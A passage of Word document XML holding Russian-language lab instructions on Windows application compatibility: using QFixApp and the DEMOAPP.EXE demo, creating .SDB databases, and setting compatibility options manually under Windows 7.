      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Воспользуйтесь сведениями из журнала программы QFixApp, для определения того, какие индивидуальные исправления совместимости используются, а какие можно исключить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используйте вкладку Исправления (Fixes), чтобы выбрать или исключить исправления совместимости в зависимости от того, действительно ли они необходимы приложению.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Откройте Дополнительные (Advanced) параметры и завершите процесс, введя необходимую дополнительную информацию, благодаря чему ОС Windows XP сможет точно определить программу, даже если на компьютер будет установлена другая программа с таким же названием.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вы можете записать эту информацию в файл .SDB базы данных совместимости для дальнейшего переноса на другие компьютеры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Хотя программа QFixApp и может использоваться для создания файлов собственной базы данных совместимости, с помощью которых можно осуществить дальнейший перенос исправлений на другие компьютеры, однако с ее помощью можно создать базу данных всего лишь для одного приложения. Для обеспечения переноса исправлений совместимости одновременно для нескольких приложений Вам необходимо воспользоваться Администратором совместимости, который будет рассмотрен в следующих разделах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DEMOAPP.EXE – демонстрационное приложение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В Пакет средств обеспечения совместимости приложений включено демонстрационное приложение с названием DEMOAPP.EXE, которое находится в папке Demoapp внутри папки Application Compatibility Toolkit. Оно имитирует приложение, которое должно запускаться только в ОС Windows 95 и у которого возникают ошибки совместимости при работе в ОС Windows XP. Данное демонстрационное приложение было разработано специально для того, чтобы Вы могли попрактиковаться со средствами, рассмотренными в данной статье.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для применения режима совместимости к DEMOAPP.EXE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустите программу QFixApp, нажав Пуск (Start), Программы (All Programs), Пакет средств обеспечения совместимости приложений (Application Compatibility Toolkit) и затем щелкните QFixApp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При выбранной вкладке Оболочки (Layers), нажмите кнопку Обзор (Browse). Используйте диалоговое окно Выбор исполняемого файла (Select an executable), чтобы найти исполняемый файл, который необходимо </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>исправить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Выберите файл и нажмите Открыть (Open).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если необходимы какие-либо параметры командной строки, введите их в текстовом поле Командной строки (Command line).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выберите необходимый режим совместимости. (Необходимо знать, что демонстрационное приложение DEMOAPP.EXE рассчитано на работу под ОС Windows 95 , поэтому во время выполнения упражнения, когда Вы запустите исполняемый файл .EXE, будет выдано сообщение о том, что приложению для работы необходима ОС Windows 95).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбрав для тестирования необходимый режим совместимости, нажмите кнопку Выполнить (Run), чтобы проверить работу выбранного режима совместимости. Если Вам кажется, что удалось добиться нормальной работы программы, Вы сможете в программе QFixApp выбрать одно из двух действий: создать постоянное исправление или продолжить работу, чтобы выбрать другие исправления совместимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание файла Собственной базы данных совместимости с помощью программы QFixApp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ограничением программы QFixApp является то, что все те исправления совместимости, которые Вы применили к приложению, действуют только во время работы самой программы QFixApp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00CB1E1D" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Охарактеризовать п</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>рограммы для обеспечения совместимости и их характеристики</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005137F6" w:rsidRPr="00617AC0" w:rsidRDefault="005137F6" w:rsidP="005137F6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc507788249"/>
      <w:bookmarkStart w:id="104" w:name="_Toc507788524"/>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="005137F6" w:rsidP="005137F6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание.</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Решение проблемы сбоя ПО отраслевой направленности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> при</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>становк</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложений, написанных для более старых версий </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ОС </w:t>
      </w:r>
      <w:r w:rsidR="00442A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Решение проблемы некорректной работы программного обеспечения отраслевой направленности: установка приложений, написанных для более старых версий Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Большинство программ, написанных для Windows XP, Vista работают и с версией Windows 7, но некоторые старые программы могут работать неправильно или не работать совсем. Если программа, написанная для более ранней версии Windows, работает </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>неправильно, можно изменить параметры совместимости программы вручную или с помощью средства устранения проблем с совместимостью программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если изменение параметров не решает проблему, посетите веб-сайт изготовителя программы, где может быть ее обновление.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совместимость программ</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - это режим Windows, который позволяет выполнять программы, написанные для более ранних версий Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не используйте средство устранения проблем с совместимостью программ для старых антивирусных программ, дисковых служебных программ или других системных программ, поскольку использование устаревших программ такоготипа может привести к потере данных или создать угрозу безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Некоторые проблемы совместимости могут быть вызваны драйверами. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если старый драйвер вызывает неполадки, необходимо обновить его вручную.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Средство устранения проблем с совместимостью программ можно также открыть, щелкнув значок программы правой кнопкой мыши и выбрав пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Исправление неполадок совместимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2115443" cy="1612800"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="230" name="Рисунок 26825" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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25" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image218.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId211" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2126133" cy="1620950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следуйте указаниям в средстве устранения проблем. Если не удается установить программу, вставьте ее установочный диск и с помощью данного средства найдите файл установки программы, обычно Setup.exe, Install.exe и т.п. Средство устранения проблем</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>не поддерживает работу</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с программами, имеющими расширение имени файла </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменение параметров совместимости вручную</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы изменить параметры совместимости для программы вручную, щелкните значок программы правой кнопкой мыши, выберите команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и затем вкладку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совместимость</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1622550" cy="2062506"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="231" name="Рисунок 26835" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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35" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image219.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId212" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1626516" cy="2067547"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Режим совместимости</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Запуск программ с параметрами предыдущей версии Windows. Включите данный параметр, если известно, что программа предназначена для той или иной предыдущей версииWindows (или работала в ней).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запуск в режиме 256 цветов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ограничение набора цветов в программе. Некоторые старые программы используют ограниченный набор цветов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использовать разрешение экрана 640 ? 480</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Запуск программы в уменьшенном окне. Включите этот параметр, если графический интерфейс пользователя имеет неровный контур или воспроизводится неверно</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
